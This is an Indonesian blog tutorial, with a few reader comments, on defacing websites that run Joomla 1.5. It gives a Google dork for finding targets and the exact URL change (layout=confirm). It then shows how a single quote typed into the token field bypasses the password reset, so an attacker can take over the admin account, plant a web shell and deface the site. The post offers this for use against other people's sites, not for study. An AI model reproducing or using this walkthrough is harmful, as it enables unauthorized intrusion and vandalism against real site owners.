Cara Deface Dengan Exploit Joomla V 1.5

Cara Deface Dengan Exploit Joomla V 1.5 - Kali ini kita targetkan joomla versi 1.5. Dengan menggunakan exploit berikut, kita bisa mereset sandi dari web tersebut dengan password yang kita inginkan. Tertarik? Simak dengan seksama.
1. Ketik dork berikut ke kotak pencarian google : inurl:option=com_user

2. Akan ada beberapa web disana. Buka salah satunya. Nanti web yang kita buka beralamatkan seperti ini :
http://site.com/index.php?option=com_user&view=reset
atau
http://site.com/index.php?option=com_user&view=login
atau
http://site.com/index.php?option=com_user&view=register
atau
http://site.com/index.php?option=com_user&view=remind

3. Sekarang, coba perhatikan view=reset, anda ganti tulisan itu dengan layout=confirm
Contoh : http://site.com/index.php?option=com_user&layout=confirm

4. Jika berhasil, akan muncul form token untuk mereset sandi dari web joomla tersebut. Isi saja kolom tokennya dengan tanda '

5. Jika berhasil, anda akan masuk ke menu reset password, nah isikan password baru yang kalian inginkan untuk login ke web tersebut nanti

6. Setelah proses reset sandi selesai, login ke web tersebut dengan username (admin) dan password baru anda melalui www.site.com/admin/ atau www.site.com/administrator/

7. Selesai, anda sudah masuk ke admin page web tersebut, tinggal otak atik aja webnya, tanemin shell lalu deface.

NB : Tidak semua web bisa di eksekusi dengan cara ini, ada yang sudah mem-patch webnya. Jadi jika anda beruntung, anda akan menemukan web yang belum di patch.

Ok, selamat mencoba - coba ^_^

4 comments:

  1. gan suruh masukan token gmn nih ???

    BalasHapus
  2. bang kok gak bisa di buka salah satu dari dork yang ane ketik

    BalasHapus
  3. gk bisa dibuka gimana gan? :-s Dan juga jangan hanya terpaku pada 1 dork, bisa dikembangin sendiri jika memang sudah tahu inti dari tutorial ini

    BalasHapus

Hargai penulis dengan memberikan komentar yang baik dan mengklik iklan yang ada

Rules komentar :
1. No SPAM
2. No live link (link aktif)
3. Jika bertanya gunakan akun yang terdaftar
4. Komentar yang tidak pantas akan dihapus oleh admin

 
Top